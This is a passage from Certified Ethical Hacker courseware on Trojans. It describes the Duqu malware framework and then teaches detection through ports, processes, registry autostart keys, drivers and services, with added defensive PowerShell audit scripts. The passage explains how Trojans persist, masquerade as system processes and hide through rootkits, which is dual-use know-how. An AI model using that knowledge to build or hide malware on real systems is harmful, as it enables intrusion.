This slice is different from the others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. It is called the Duqu Framework.

Duqu Framework Code Properties

The code that implements the Duqu Framework has several distinctive properties:
- Everything is wrapped into objects
- Function table is placed directly into the class instance and can be modified after construction
- There is no distinction between utility classes (linked lists, hashes) and user-written code
- Objects communicate using method calls, deferred execution queues, and event-driven callbacks
- There are no references to run-time library functions; native Windows API is used instead

Event-Driven Framework

The layout and implementation of objects in the Duqu Framework is definitely not native to the C++ that was used to program the rest of the Trojan. There is an even more interesting feature of the framework that is used extensively throughout the whole code: it is event driven. There are special objects that implement the event-driven model:
- Event objects, based on native Windows API handles
- Thread context objects that hold lists of events and deferred execution queues
- Callback objects that are linked to events
- Event monitors, created by each thread context for monitoring events and executing callback objects
- Thread context storage manages the list of active threads and provides access to per-thread context objects
Trojan Analysis: Event Driven Framework

This event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, nor does it look like it was compiled with known Objective C compilers.

(diagram: two objects, each with an Event Object, an Event Monitor and a Callback Object, tied to a Thread Context holding the event and call queue; the thread contexts are tracked in Thread Context Storage; reproduced as Figure 6.47)

http://www.securelist.com
Trojan Analysis: Event Driven Framework

Source: http://www.securelist.com

The event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, nor does it look like it was compiled with known Objective C compilers.
FIGURE 6.47: Event Driven Framework. Diagram components: Object 1, Object 2, Event Object, Event Monitor, Callback Object, Thread Context (event and call queue), Thread Context Storage.
Module Flow

So far, we have discussed how a Trojan infects a system and the types of Trojans available. Now we will discuss how to conduct Trojan detection. Trojan detection helps in detecting the presence of Trojans on an infected system and thus helps you protect the system and its resources from further loss.

Module sections:
- Trojan Concepts
- Trojans Infection
- Types of Trojans
- Trojan Detection
- Countermeasures
- Anti-Trojan Software
- Penetration Testing
This section focuses on Trojan detection using various techniques or methods.
How to Detect Trojans
- Scan for suspicious OPEN PORTS
- Scan for suspicious RUNNING PROCESSES
- Scan for suspicious REGISTRY ENTRIES
- Scan for suspicious DEVICE DRIVERS installed on the computer
- Scan for suspicious WINDOWS SERVICES
- Scan for suspicious STARTUP PROGRAMS
- Scan for suspicious FILES and FOLDERS
- Scan for suspicious NETWORK ACTIVITIES
- Scan for suspicious modification to OPERATING SYSTEM FILES
- Run Trojan SCANNER to detect Trojans
How to Detect Trojans

Trojans are malicious programs that masquerade as a useful or legitimate file, but their actual purpose is to take complete control of your computer, thereby accessing your files and confidential information. To avoid such unauthorized access and to protect your files and personal information, use an antivirus product that automatically scans for and detects Trojans on your system, or detect the Trojans installed on your system manually. The following are the steps for detecting Trojans:

1. Scan for suspicious OPEN PORTS
2. Scan for suspicious RUNNING PROCESSES
3. Scan for suspicious REGISTRY ENTRIES
4. Scan for suspicious DEVICE DRIVERS installed on the computer
5. Scan for suspicious WINDOWS SERVICES
6. Scan for suspicious STARTUP PROGRAMS
7. Scan for suspicious FILES and FOLDERS
8. Scan for suspicious NETWORK ACTIVITIES
9. Scan for suspicious modification to OPERATING SYSTEM FILES
10. Run a Trojan SCANNER to detect Trojans
Scanning for Suspicious Ports
- Trojans open unused ports on the victim machine to connect back to Trojan handlers
- Look for connections established to unknown or suspicious IP addresses

(screenshot: output of netstat -an in a command prompt, reproduced as Figure 6.48)
Scanning for Suspicious Ports

Trojans open unused ports on the victim's machine to connect back to the Trojan handlers. These Trojans can be identified by scanning for suspicious ports. Scan for suspicious ports and look for connections established to unknown or suspicious IP addresses. Note that netstat -an shows only addresses and states; netstat -ano adds the owning process ID, which can be matched against the output of tasklist /svc to find the program behind a suspicious socket.
C:\Users\Admin> netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:554            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1027           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1028           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:10243          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:22350          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:12025        0.0.0.0:0              LISTENING
  TCP    127.0.0.1:12080        0.0.0.0:0              LISTENING
  TCP    127.0.0.1:12080        127.0.0.1:53850        ESTABLISHED
  TCP    127.0.0.1:12080        127.0.0.1:53852        ESTABLISHED
  TCP    127.0.0.1:12110        0.0.0.0:0              LISTENING

Type netstat -an in command prompt

FIGURE 6.48: Scanning for Suspicious Ports
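The listing above leaves the analyst to decide by hand which of the seventeen sockets matter, and it never says which process owns each one. The following PowerShell script is an added example for this page, not EC-Council's code; it does the correlation in one pass and flags the three things the text tells you to look for: listeners on ports outside your baseline, established sessions to non-private addresses, and sockets owned by images running from outside the Windows and Program Files directories. It assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection) and an elevated prompt. The $knownListeners list is a placeholder baseline to replace with your own.

```powershell
# Added example (not from the CEH text): correlate every TCP socket with its
# owning process and flag what Trojan handler traffic tends to look like.
# Assumes Windows 8 / Server 2012 or later and an elevated prompt.

# Loopback, unspecified and RFC 1918 / link-local addresses: a peer in one of
# these ranges is not interesting on its own.
function Test-PrivateAddress {
  param([string]$Address)
  return ($Address -match '^(127\.|10\.|192\.168\.|169\.254\.|0\.0\.0\.0$|::1?$|fe80:)' -or
          $Address -match '^172\.(1[6-9]|2[0-9]|3[01])\.')
}

# Ports that normally listen on a Windows workstation; replace with your own
# baseline. Ports at or above 49152 are the dynamic range and are skipped.
$knownListeners = @(135, 139, 445, 3389, 5357)

# PID -> Win32_Process, so each socket can be tied to an image path.
$procs = @{}
Get-CimInstance Win32_Process | ForEach-Object { $procs[[int]$_.ProcessId] = $_ }

$rows = Get-NetTCPConnection | ForEach-Object {
  $p     = $procs[[int]$_.OwningProcess]
  $path  = if ($p) { $p.ExecutablePath } else { $null }
  $flags = @()
  if ($_.State -eq 'Listen' -and $_.LocalPort -lt 49152 -and
      $_.LocalPort -notin $knownListeners) { $flags += 'unexpected-listener' }
  if ($_.State -eq 'Established' -and -not (Test-PrivateAddress $_.RemoteAddress)) {
    $flags += 'external-peer'
  }
  if ($path -and $path -notmatch '^[A-Za-z]:\\(Windows|Program Files)') {
    $flags += 'image-outside-system-dirs'
  }
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.Name } else { '?' }
    Image   = $path
    Flags   = ($flags -join ',')
  }
}

# Only the flagged sockets; drop the Where-Object to see the whole table.
$rows | Where-Object { $_.Flags } | Sort-Object State, Local | Format-Table -AutoSize
```

Against the listing in Figure 6.48, this would single out the listeners on 554, 1025 to 1029, 2869, 10243, 22350 and the 120xx loopback ports for a look at their owning process, while the RPC and SMB listeners and the loopback sessions would pass. A listener owned by an image under a user profile or temp directory is the classic Trojan signature; one owned by svchost.exe is not by itself suspicious, but its service list (tasklist /svc) should still be checked.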
Port Monitoring Tools: TCPView and CurrPorts
- TCPView is a Windows program that will show detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections
- CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer

(screenshots: the TCPView and CurrPorts main windows, reproduced as Figures 6.49 and 6.50)

http://technet.microsoft.com
http://www.nirsoft.net
Port Monitoring Tools: TCPView and CurrPorts

TCPView

Source: http://technet.microsoft.com

TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and the state of TCP connections. On Windows NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. It provides a more informative and conveniently presented subset of the Netstat program that is shipped with Windows. It works on Windows NT/2000/XP and Windows 98/ME. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions. On Windows XP systems, TCPView shows the name of the process that owns each endpoint. By default, TCPView is updated every second. Endpoints that change state from one update to the next are highlighted in yellow; those that are deleted are shown in red, and new endpoints are shown in green. The user can close established TCP/IP connections (those labeled with a state of ESTABLISHED) and save TCPView's output window to a file as well.
FIGURE 6.49: TCPView Tool Screenshot. The TCPView window lists Process, PID, Protocol, Local Address, Local Port, Remote Address, Remote Port and State for each endpoint; visible entries include chrome.exe (PID 772) with ESTABLISHED http/https connections to external hosts, googletalk.exe (PID 3688), lsass.exe (PID 644) and services.exe (PID 636) LISTENING, and a SYN_SENT connection. Status bar: Endpoints: 69, Established: 22, Listening: 28, Time Wait: 1, Close Wait: 1.
CurrPorts Tool

Source: http://www.nirsoft.net

CurrPorts allows you to view a list of ports that are currently in use and the application that is using the ports. You can close a selected connection and also terminate the process using it, and export all or selected items to an HTML or text report. It displays the list of all currently opened TCP/IP and UDP ports on the system. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, etc.), the time that the process was created, and the user who created it. It allows you to close unwanted TCP connections, kill the process that opened the ports, and save the TCP/UDP ports information to an HTML file, XML file, or tab-delimited text file.

FIGURE 6.50: CurrPorts Tool Screenshot. The CurrPorts window lists Process Name, Process ID, Protocol, Local Port, Local Address, Remote Port and Remote Address; visible entries are System UDP listeners (isakmp 500, ssdp 1900, ws-discovery 3702, ipsec-msft 4500, llmnr 5355) and TCP http connections from 10.0.0.12 on ports 49244 to 49254 owned by unknown processes. Status bar: 53 Total Ports, 1 Selected.
Scanning for Suspicious Processes
- Trojans camouflage themselves as genuine Windows services or hide their processes to avoid detection
- Some Trojans inject their PE (Portable Executable) code into other processes (such as explorer.exe or web browsers)
- The processes are visible but look like legitimate processes, which also helps bypass desktop firewalls
- Trojans can also use rootkit methods to hide their processes
- Process Monitor is a monitoring tool for Windows that shows file system, registry, and process/thread activity
- Use process monitoring tools to detect hidden Trojans and backdoors

(screenshot: the Process Monitor main window, reproduced as Figure 6.51)

http://technet.microsoft.com
Scanning for Suspicious Processes

There are various symptoms that can indicate that a system has been infected: the system suddenly becomes slow, download speeds drop, and Internet speed falls drastically. Attackers use rootkit methods to make the Trojan hide in the system where it cannot normally be detected by antivirus software. These Trojans and worms usually enter the system through pictures, music files, videos, etc. that are downloaded to the system. Initially, everything seems fine, but slowly they show their effect in various ways. By using process monitoring tools, we can detect hidden Trojans, worms, and backdoors. Hidden Trojans and other malware can be detected by scanning for suspicious processes.

Process Monitor

Source: http://technet.microsoft.com

Process Monitor is a monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. It is used to analyze the behavior of spyware and dubious programs. Its features include rich and non-destructive filtering, comprehensive event properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, etc.

FIGURE 6.51: Process Monitor. The screenshot shows the event list with Time, Process Name, PID, Operation, Path and Result columns; visible events include Explorer.EXE (PID 5572) opening registry keys under HKLM\Software\Microsoft\Windows and files under C:\Program Files (x86)\Mozilla Firefox, and csrss.exe (PID 548) reading C:\Windows\System32\sxssrv.dll, csrsrv.dll and sxs.dll. Status bar: Showing 359,375 of 652,305 events (54%), Backed by virtual memory.
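Process Monitor shows what a process does; the first triage question is whether the process should be there at all. The following PowerShell script is an added example for this page (not from EC-Council or Sysinternals) that walks the process list once and reports the masquerading patterns described above: a well-known Windows image name running from the wrong directory, an image whose Authenticode signature does not verify, and core system processes with an unexpected parent. The $expected table is an illustrative baseline, not an exhaustive one, and the script cannot see a process hidden by a kernel-mode rootkit; for that, its output has to be compared with a tool that walks kernel structures directly. Run it elevated so ExecutablePath is readable for every process.

```powershell
# Added example (not from the CEH text or Sysinternals): one pass over the
# process list looking for the masquerading described above. Assumes
# PowerShell 3.0+ and an elevated prompt (so ExecutablePath is readable for
# every process). It cannot see a process hidden by a kernel-mode rootkit.

$sys32  = (Join-Path $env:SystemRoot 'System32').ToLower()
$winDir = $env:SystemRoot.ToLower()

# Where core Windows images live and, where the parent outlives the child,
# which process should have started them. Illustrative baseline; extend it.
# (smss.exe and userinit.exe exit after spawning their children, so the
# parent check is left out for csrss, winlogon and explorer.)
$expected = @{
  'svchost.exe'  = @{ Dir = $sys32;  Parent = 'services.exe' }
  'lsass.exe'    = @{ Dir = $sys32;  Parent = 'wininit.exe' }
  'services.exe' = @{ Dir = $sys32;  Parent = 'wininit.exe' }
  'csrss.exe'    = @{ Dir = $sys32;  Parent = $null }
  'winlogon.exe' = @{ Dir = $sys32;  Parent = $null }
  'explorer.exe' = @{ Dir = $winDir; Parent = $null }
}

# Kernel-backed pseudo-processes that legitimately have no image on disk.
$noImageOk = @('system idle process', 'system', 'registry', 'memory compression', 'secure system')

$procs = Get-CimInstance Win32_Process
$byPid = @{}
foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

$report = foreach ($p in $procs) {
  $name  = $p.Name.ToLower()
  $path  = $p.ExecutablePath
  $flags = @()

  if (-not $path) {
    if ($name -notin $noImageOk) { $flags += 'no-image-path' }
  } else {
    $dir = ([System.IO.Path]::GetDirectoryName($path)).ToLower()
    if ($expected.ContainsKey($name) -and $dir -ne $expected[$name].Dir) {
      $flags += "wrong-dir:$dir"
    }
    $sig = Get-AuthenticodeSignature -FilePath $path -ErrorAction SilentlyContinue
    if ($sig -and $sig.Status -ne 'Valid') { $flags += "signature:$($sig.Status)" }
  }

  # PIDs are reused, so only trust the parent when it is still running.
  $want   = if ($expected.ContainsKey($name)) { $expected[$name].Parent } else { $null }
  $parent = $byPid[[int]$p.ParentProcessId]
  if ($want -and $parent -and $parent.Name.ToLower() -ne $want) {
    $flags += "parent:$($parent.Name)"
  }

  if ($flags) {
    [pscustomobject]@{
      PID   = $p.ProcessId
      Name  = $p.Name
      Path  = $path
      Flags = ($flags -join ' ')
    }
  }
}

$report | Format-Table -AutoSize
```

A svchost.exe reported as wrong-dir or with a parent other than services.exe is the textbook case of a Trojan borrowing a system process name. Unsigned third-party software will also appear under signature:NotSigned, so the signature column is a prompt to check the vendor and install path rather than proof of infection on its own.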
Process Monitoring Tool: What's Running
- What's Running gives an inside look into your Windows operating system
- Inspect the processes and get performance and resource usage data such as memory usage, processor usage, and handles
- Information about DLLs loaded, services running within the process, and IP connections associated with processes
Process Monitoring Tool: What's Running

Source: http://www.whatsrunning.net

What's Running gives you an inside look into your Windows system (2000/XP/2003/Vista/Windows 7). It explores processes, services, modules, IP connections, drivers, etc. through a simple-to-use application.

- Processes: It inspects the processes and gives performance and resource usage data such as memory usage, processor usage, and handles. It gives all the details about DLLs that are loaded, services that are running within the process, and the IP connections each process has
- IP connections: It gives all the active IP connections in your system
- Services: Inspects the services that are running and stopped
- Modules: Finds out the information about all DLLs and EXEs that are in use on your system
Drivers: It finds out the information about all drivers, for running drivers you can inspect
the file version for finding the supplier of the drive System information: It shows crucial system information about your system such as
installed memory, processor, registered user, and operating system and its version —
FIGURE 6.52: What's Running Tool Screenshot
Process Monitoring Tools

There are many process monitoring tools that you can use for the detection of Trojans installed on your system. These tools display a list of all the processes running or installed on your system; by analyzing the list you can identify the Trojans. These tools provide a comprehensive monitoring console for your entire network and IT infrastructure. They continuously and proactively monitor the entire IT system, so that any outages or performance degradations can be immediately identified and notified. In addition, they kill software that threatens your computer, even if it is hidden. A few process monitoring tools are listed as follows:

- PrcView available at http://www.teamcti.com
- Winsonar available at http://www.fewbyte.com
- HiddenFinder available at http://www.wenpoint.com
- Autoruns for Windows available at http://technet.microsoft.com
- KillProcess available at http://orangelampsoftware.com
- Security Task Manager available at http://www.neuber.com
- Yet Another (remote) Process Monitor available at http://yaprocmon.sourceforge.net
- MONIT available at http://mmonit.com
- Process Monitor available at http://technet.microsoft.com
- OpManager available at http://www.manageengine.com
Scanning for Suspicious Registry Entries

When a Trojan gets installed on the victim's machine, it generates a registry entry. We can notice various changes: the first symptom is that the system gets slower, and various advertisements keep popping up. So, scanning for suspicious registry entries will help in detecting Trojans. Windows automatically executes instructions in the following sections of the registry:

- Run
- RunServices
- RunOnce
- RunServicesOnce
- HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %*

Scanning registry values for suspicious entries may indicate a Trojan infection. Trojans insert instructions at these sections of the registry to perform malicious activities.
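The registry check described above, as an added PowerShell example that is not part of the courseware or of jv16 PowerTools: it walks the Run, RunOnce, RunServices and RunServicesOnce keys under HKLM and HKCU (including the WOW6432Node view) and compares the exefile open command against the Windows default "%1" %*. The function names and the flag heuristics (unsigned image, user-writable directory, script host) are the example's own assumptions.

```powershell
# Added example (not from the courseware or jv16 PowerTools): enumerate the
# autostart registry locations named in the module and flag entries worth a look.

function Test-AutostartCommand {
    param([string]$Location, [string]$Command)

    # Image path from a command line: a quoted path, or else the first token.
    $image = ''
    if ($Command -match '^\s*"([^"]+)"')  { $image = $Matches[1] }
    elseif ($Command -match '^\s*(\S+)') { $image = $Matches[1] }
    $image = [Environment]::ExpandEnvironmentVariables($image)

    $flags = @(); $sig = ''
    if ($image -and (Test-Path -LiteralPath $image)) {
        $sig = (Get-AuthenticodeSignature -LiteralPath $image).Status.ToString()
        if ($sig -ne 'Valid') { $flags += "sig:$sig" }
    } elseif ($image) {
        $flags += 'image-missing'   # stale entry, or a path that only resolves in another context
    }
    # Heuristics (assumptions, not rules from the page).
    if ($image -match '\\(Temp|AppData|Downloads|Public|ProgramData)\\') { $flags += 'user-writable-dir' }
    if ($Command -match '\b(rundll32|regsvr32|mshta|wscript|cscript|powershell)\b') { $flags += 'script-host' }

    [pscustomobject]@{ Location = $Location; Command = $Command; Image = $image; Signature = $sig; Flags = ($flags -join ',') }
}

function Get-AutostartEntries {
    [CmdletBinding()]
    param()

    $keyNames = 'Run', 'RunOnce', 'RunServices', 'RunServicesOnce'
    $bases = 'Software\Microsoft\Windows\CurrentVersion',
             'Software\WOW6432Node\Microsoft\Windows\CurrentVersion'   # 32-bit view on 64-bit Windows

    foreach ($hive in 'HKLM:', 'HKCU:') {
        foreach ($base in $bases) {
            foreach ($name in $keyNames) {
                $key = "$hive\$base\$name"
                if (-not (Test-Path -LiteralPath $key)) { continue }   # absent keys are skipped
                foreach ($p in (Get-ItemProperty -LiteralPath $key).PSObject.Properties) {
                    if ($p.Name -like 'PS*') { continue }   # provider metadata, not a registry value
                    Test-AutostartCommand -Location "$key\$($p.Name)" -Command ([string]$p.Value)
                }
            }
        }
    }

    # Every .exe launch goes through this command; anything but the default "%1" %*
    # means another program runs first.
    $exeKey = 'Registry::HKEY_CLASSES_ROOT\exefile\shell\open\command'
    $exeCmd = [string](Get-ItemProperty -LiteralPath $exeKey).'(default)'
    [pscustomobject]@{
        Location  = $exeKey
        Command   = $exeCmd
        Image     = ''
        Signature = ''
        Flags     = if ($exeCmd.Trim() -eq '"%1" %*') { '' } else { 'exefile-handler-modified' }
    }
}

# Show only entries that raised a flag; drop the Where-Object to see every autostart value.
Get-AutostartEntries | Where-Object { $_.Flags } | Format-List
```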
jv16 PowerTools 2012 - Registry Cleaner

Source: http://www.macecraft.com

jv16 PowerTools 2012 is the ultimate registry cleaner, used to find registry errors and unneeded registry junk; it helps in detecting registry entries created by Trojans.
FIGURE 6.53: jv16 PowerTools 2012 - Registry Cleaner
Registry Entry Monitoring Tool: PC Tools Registry Mechanic

Source: http://www.pctools.com

PC Tools Registry Mechanic is an advanced registry cleaner that scans the registry values for suspicious entries created by Trojan infections. It fixes Windows errors, improves your system speed, and maximizes software performance. It cleans up your system and secures your personal privacy: it keeps all your Internet and PC activities private and erases sensitive information permanently.
FIGURE 6.54: PC Tools Registry Mechanic Tool Screenshot
Registry Entry Monitoring Tools

In addition to jv16 PowerTools 2012 - Registry Cleaner and PC Tools Registry Mechanic, there are many other tools that allow you to monitor registry entries and thus help detect Trojans installed, if any. A few of the registry entry monitoring tools that are mainly used for the purpose of cleaning the registry are listed as follows:

- Reg Organizer available at http://www.chemtable.com
- Registry Shower available at http://www.registryshower.com
- Comodo Cloud Scanner available at http://www.comodo.com
- Buster Sandbox Analyzer available at http://bsa.isoftware.nl
- All-Seeing Eyes available at http://www.fortego.com
- MJ Registry Watcher available at http://www.jacobsm.com
- Active Registry Monitor available at http://www.devicelock.com
- SpyMe Tools available at http://www.lcibrossolutions.com
- Regshot available at http://regshot.sourceforge.net
- Registry Live Watch available at http://leelusoft.blogspot.in
Scanning for Suspicious Device Drivers

When device drivers are downloaded from various sources that are not trustworthy, Trojans may also get installed on the system. Trojans use these drivers as covers to hide, but by using device driver monitoring tools we can identify whether any Trojan is present. Trojans are installed along with device drivers downloaded from untrusted sources and use these drivers as a shield to avoid detection. Scan for suspicious device drivers and verify that they are genuine and downloaded from the publisher's original site.
Go to Run > type msinfo32 > Software Environment > System Drivers

FIGURE 6.55: Scanning for Suspicious Device Drivers
Device Drivers Monitoring Tool: DriverView

Source: http://www.nirsoft.net

The DriverView utility displays the list of all device drivers currently loaded on your system. Additional information is displayed for each driver in the list, such as the load address of the driver, description, version, product name, company that created the driver, etc. Instead of browsing for system components separately in Control Panel, just by running this application on your system you can easily see all the drivers on your system. This application displays the list of drivers quickly and easily, and it can create HTML reports.
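The driver check described in the two passages above (the msinfo32 System Drivers list, and the version and company columns DriverView adds), as an added PowerShell example that is not part of the courseware, of msinfo32 or of DriverView: it lists every driver registered with the Service Control Manager together with its image path, Authenticode status and signer, and flags unsigned, missing or out-of-Windows-directory images. The function name, the path normalisation and the flag heuristics are the example's own assumptions.

```powershell
# Added example (not from the courseware, msinfo32 or DriverView): list every
# driver the Service Control Manager knows about, with image path, signature
# status and signer, and flag the ones a defender should look at first.

function Get-DriverInventory {
    [CmdletBinding()]
    param([switch]$RunningOnly)

    $windir = $env:windir
    foreach ($drv in Get-CimInstance -ClassName Win32_SystemDriver) {
        if ($RunningOnly -and $drv.State -ne 'Running') { continue }

        # Assumption: PathName is usually already a Win32 path; the two replacements
        # cover the NT-style spellings (\??\ and \SystemRoot) that occasionally appear.
        $path = [string]$drv.PathName
        $path = $path -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $windir
        $path = [Environment]::ExpandEnvironmentVariables($path)

        $status = 'file-missing'; $signer = ''
        if ($path -and (Test-Path -LiteralPath $path)) {
            $sig    = Get-AuthenticodeSignature -LiteralPath $path
            $status = $sig.Status.ToString()
            if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
        }

        # Heuristic flags (assumptions, not rules from the page).
        $flags = @()
        if ($status -ne 'Valid') { $flags += "sig:$status" }
        if ($path -and -not $path.StartsWith($windir, [StringComparison]::OrdinalIgnoreCase)) { $flags += 'outside-windir' }
        if ($drv.State -eq 'Running' -and $status -eq 'file-missing') { $flags += 'running-but-no-file' }
        if ($signer -and $signer -notmatch 'Microsoft') { $flags += 'third-party-signer' }

        [pscustomobject]@{
            Name      = $drv.Name
            Display   = $drv.DisplayName
            State     = $drv.State
            StartMode = $drv.StartMode
            Path      = $path
            Signature = $status
            Signer    = $signer
            Flags     = ($flags -join ',')
        }
    }
}

# Without the Where-Object filter this is the full msinfo32 / DriverView style listing.
Get-DriverInventory -RunningOnly | Where-Object { $_.Flags } |
    Format-Table Name, State, StartMode, Signature, Signer, Flags, Path -AutoSize
```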
FIGURE 6.56: DriverView Screenshot
Device Drivers Monitoring Tools

A few of the device driver monitoring tools that help in detecting Trojans are listed as follows:

- Driver Detective available at http://www.drivershq.com
- Unknown Device Identifier available at http://www.zhangduo.com
- DriverGuide Toolkit available at http://www.driverguidetoolkit.com
- DriverMax available at http://www.innovative-sol.com
- Driver Magician available at http://www.drivermagician.com
- Driver Reviver available at http://www.reviversoft.com
- DriverScanner available at http://www.uniblue.com
- Double Driver available at http://www.boozet.org
- My Drivers available at http://www.zhangduo.com
- DriverEasy available at http://www.drivereasy.com
Scanning for Suspicious Windows Services

Once Trojans are installed as Windows services, it becomes easy for an attacker to operate the system from a remote location. Trojans also create their processes to look like genuine Windows services in order to avoid detection. With the help of Windows services monitoring tools, you can detect the Trojans.

Trojans that spawn Windows services allow attackers remote control of the target machine and pass malicious instructions. Trojans rename their processes to look like a genuine Windows service in order to avoid detection. Trojans employ rootkit techniques to manipulate the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services registry keys to hide their processes.
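The cross-check described above, as an added PowerShell example that is not part of the courseware or of Enterprise Service Manager: it compares the keys under HKLM\SYSTEM\CurrentControlSet\Services with what the Service Control Manager enumerates, and flags keys that look like services but are not reported, as well as services whose image or ServiceDll is unsigned or missing. The function names, the Type-value heuristic and the path normalisation are the example's own assumptions.

```powershell
# Added example (not from the courseware or Enterprise Service Manager):
# registry-vs-SCM comparison of Windows services and drivers.

function Resolve-ServiceImagePath {
    param([string]$ImagePath)
    # Registry image paths come in several spellings; normalise to a Win32 path and drop arguments.
    $p = $ImagePath -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $env:windir
    $p = $p -replace '^System32\\', "$env:windir\System32\"
    $p = [Environment]::ExpandEnvironmentVariables($p)
    if ($p -match '^"([^"]+)"') { return $Matches[1] }
    if ($p -match '^(.+?\.(exe|sys|dll))(\s|$)') { return $Matches[1] }
    return $p
}

function Get-ServiceRegistryDiscrepancies {
    [CmdletBinding()]
    param()

    # Names the SCM reports: Win32 services plus kernel and file-system drivers.
    $scm = @{}
    Get-CimInstance -ClassName Win32_Service      | ForEach-Object { $scm[$_.Name.ToLower()] = $true }
    Get-CimInstance -ClassName Win32_SystemDriver | ForEach-Object { $scm[$_.Name.ToLower()] = $true }

    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
        $v = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        # Assumption: a key with both Type and ImagePath describes a service or driver;
        # keys without them are parameter containers and are skipped.
        if ($null -eq $v.Type -or -not $v.ImagePath) { continue }

        $exe   = Resolve-ServiceImagePath ([string]$v.ImagePath)
        $flags = @()
        if (-not $scm.ContainsKey($key.PSChildName.ToLower())) { $flags += 'not-enumerated-by-scm' }

        $status = 'image-missing'
        if (Test-Path -LiteralPath $exe) { $status = (Get-AuthenticodeSignature -LiteralPath $exe).Status.ToString() }
        if ($status -ne 'Valid') { $flags += "sig:$status" }
        if ($status -ne 'Valid' -and -not $exe.StartsWith($env:windir, [StringComparison]::OrdinalIgnoreCase)) {
            $flags += 'outside-windir'
        }

        # svchost-hosted services keep their real code in Parameters\ServiceDll.
        $params = Get-ItemProperty -LiteralPath "$($key.PSPath)\Parameters" -ErrorAction SilentlyContinue
        $dll = if ($params.ServiceDll) { $params.ServiceDll } elseif ($v.ServiceDll) { $v.ServiceDll } else { '' }
        if ($dll) {
            $dll = [Environment]::ExpandEnvironmentVariables($dll)
            if (-not (Test-Path -LiteralPath $dll)) { $flags += 'servicedll-missing' }
            elseif ((Get-AuthenticodeSignature -LiteralPath $dll).Status -ne 'Valid') { $flags += 'servicedll-unsigned' }
        }

        if ($flags.Count -gt 0) {
            [pscustomobject]@{
                Service = $key.PSChildName
                Type    = ('0x{0:x}' -f [int]$v.Type)
                Start   = $v.Start
                Image   = $exe
                Dll     = $dll
                Flags   = ($flags -join ',')
            }
        }
    }
}

Get-ServiceRegistryDiscrepancies | Format-Table Service, Type, Start, Flags, Image -AutoSize
```

Both views here are read from user mode, so a kernel-mode rootkit that filters the SCM and the registry API alike stays invisible to this comparison; corroborate flagged or suspiciously clean results with an offline inspection of the system hive.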
FIGURE 6.57: Scanning for Suspicious Windows Services
Windows Services Monitoring Tool: Windows Service Manager (SrvMan)
Source: http://tools.sysprogs.org
Windows Service Manager is a tool that simplifies all common tasks related to Windows services. It can create services for both Win32 applications and legacy drivers without shutting down and restarting Windows. It can also delete existing services and change the configuration of other services. It has both GUI and command-line modes. It can also be used to run arbitrary Win32 applications as services. It supports all modern 32-bit and 64-bit versions of Windows.
Module 06 Page 969
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
FIGURE 6.58: Windows Service Manager (SrvMan) Tool Screenshot
Windows Services Monitoring Tools
Windows services monitoring tools monitor critical Windows services and optionally restart them after failure. A few of the Windows service monitoring tools that are readily available in the market are listed as follows:
- SMART Utility available at http://www.thewindowsclub.com
- Netwrix Service Monitor available at http://www.netwrix.com
- Vista Services Optimizer available at http://www.smartpcutilities.com
- ServiWin available at http://www.nirsoft.net
- Windows Service Manager Tray available at http://winservicemanager.codeplex.com
- AnVir Task Manager available at http://www.anvir.com
- Process Hacker available at http://processhacker.sourceforge.net
- Free Windows Service Monitor Tool available at http://www.manageengine.com
- Overseer Network Monitor available at http://www.overseer-network-monitor.com
- Total Network Monitor available at http://www.softinventive.com
Scanning for Suspicious Startup Programs
Trojans, once installed on the computer, start automatically at system startup. Therefore, scanning for suspicious startup programs is very essential for detecting Trojans. By following these simple steps, you can identify if there are any hidden Trojans:
Step 1: Check the Startup folder
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\(User-Name)\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Step 2: Check Windows services that are automatically started
Go to Run, type services.msc, and click Sort by Startup Type
Step 3: Check startup program entries in the registry
Details are covered in the next slide
Step 4: Check that device drivers are automatically loaded
C:\Windows\System32\drivers
Check boot.ini or bcd (bootmgr) entries
Windows 8 Startup Registry Entries
Programs that run on Windows startup can be located in these registry entries:
Explorer Startup Setting
